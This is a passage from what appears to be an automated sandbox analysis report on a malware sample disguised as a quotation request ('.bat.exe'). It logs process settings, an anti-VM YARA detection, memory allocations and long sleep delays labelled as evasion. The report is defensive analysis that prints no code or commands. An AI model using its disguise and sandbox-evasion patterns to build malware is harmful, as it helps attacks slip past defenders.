Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIADAP.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIADAP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIADAP.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7428, type: MEMORYSTR

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Memory allocated: 1530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Memory allocated: 30B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Memory allocated: 2E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Memory allocated: 7E30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Memory allocated: 8E30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Memory allocated: 8FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Memory allocated: 9FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Memory allocated: 1620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Memory allocated: 30D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Memory allocated: 50D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Memory allocated: 1110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Memory allocated: 2F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Memory allocated: 2DC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Memory allocated: 77D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Memory allocated: 87D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Memory allocated: 8960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Memory allocated: 9960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Memory allocated: 2690000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Memory allocated: 2820000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Memory allocated: 4820000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599326	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599107	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Thread delayed: delay time: 597139	Jump to behavior
